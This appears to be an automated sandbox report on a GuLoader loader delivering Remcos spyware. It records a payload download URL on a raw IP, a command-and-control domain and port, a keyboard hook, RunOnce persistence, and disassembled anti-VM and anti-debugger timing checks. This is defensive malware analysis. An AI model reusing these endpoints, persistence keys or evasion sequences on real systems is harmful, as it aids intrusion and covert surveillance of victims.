Source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"} |
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe |
Virustotal: Detection: 28% |
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe |
ReversingLabs: Detection: 13% |
Source: Fec9qUX4at.exe |
Virustotal: Detection: 28% |
Source: Fec9qUX4at.exe |
ReversingLabs: Detection: 13% |
Source: Yara match |
File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR |
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe |
Joe Sandbox ML: detected |
Source: Fec9qUX4at.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: Malware configuration extractor |
URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: unknown |
DNS query: name: wealthyrem.ddns.net |
Source: global traffic |
TCP traffic: 192.168.2.3:49733 -> 194.5.97.128:39200 |
Source: Joe Sandbox View |
ASN Name: DANILENKODE DANILENKODE |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
DNS traffic detected: queries for: wealthyrem.ddns.net |
Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000000.00000002.338277052.000000000063A000.00000004.00000020.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process Stats: CPU usage > 98% |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5586A NtAllocateVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F505E0 EnumWindows,NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F509C7 NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58F67 NtProtectVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F542D5 NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F558D5 NtAllocateVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54693 NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54A46 NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54A2D NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54C15 NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58FBB NtProtectVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5475A NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_00401144 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F584C9 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5209D |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F50C76 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F55661 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5586A |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F505E0 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F509C7 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F59577 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52559 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F542D5 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F514D1 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F514D9 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F506D9 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F50CC2 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F510C2 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F520C2 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F538B9 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F57AA5 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F57EAD |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52AAE |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54693 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54292 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58C9D |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F53051 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F55C5C |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54A46 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5864F |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F53424 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54A2D |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F54C15 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F55E11 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5380C |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F585F7 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F50BE6 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F53FDB |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F577CC |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F53996 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F51D86 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58181 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F51D8F |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52D7C |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F57F61 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58355 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58759 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5475A |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5215A |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5293E |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52138 |
Source: Fec9qUX4at.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: FANEBREREN.exe.17.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: Fec9qUX4at.exe, 00000000.00000002.338068961.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000000.00000002.338242291.00000000005F0000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenameuser32j% vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp |
Binary or memory string: originalfilename vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000000.336595549.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.490989304.000000001DD60000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp |
Binary or memory string: OriginalFilenamewscript.exe.mui` vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp |
Binary or memory string: OriginalFilenamewscript.exe` vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe, 00000011.00000002.491075491.000000001E670000.00000002.00000001.sdmp |
Binary or memory string: System.OriginalFileName vs Fec9qUX4at.exe |
Source: Fec9qUX4at.exe |
Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winEXE@5/4@1/2 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File created: C:\Users\user\AppData\Local\Temp\~DFDAA17C5C5846B2AF.TMP |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' |
Source: Fec9qUX4at.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: unknown |
Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe' |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe' |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
Source: Yara match |
File source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, type: MEMORY |
Source: initial sample |
Static PE information: section name: .text entropy: 7.05513425915 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F50C76 TerminateProcess, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
File opened: C:\Program Files\qga\qga.exe |
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\FANEBREREN.EXE\DYKKERDRAGTSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEAMPHITHYRONS |
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57DB5 second address: 0000000004F57DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57E05 second address: 0000000004F57C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000004F57C28 second address: 0000000004F57E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000000567DB5 second address: 0000000000567DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000000567E05 second address: 0000000000567C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000000567C28 second address: 0000000000567E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc |
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\FANEBREREN.exe\DYKKERDRAGTSSoftware\Microsoft\Windows\CurrentVersion\RunOnceAMPHITHYRONS |
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Thread information set: HideFromDebugger |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process queried: DebugPort |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F55BFE LdrInitializeThunk, |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5546D mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5864F mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5380C mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F585F7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F579C6 mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F573B7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52D7C mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58355 mov eax, dword ptr fs:[00000030h] |
Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp, logs.dat.17.dr |
Binary or memory string: [ Program Manager ] |
Source: Fec9qUX4at.exe, 00000011.00000002.487647862.00000000009D7000.00000004.00000020.sdmp |
Binary or memory string: Program Managerq |
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp |
Binary or memory string: |Program Manager| |
Source: C:\Windows\SysWOW64\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: Initial file |
Signature Results: GuLoader behavior |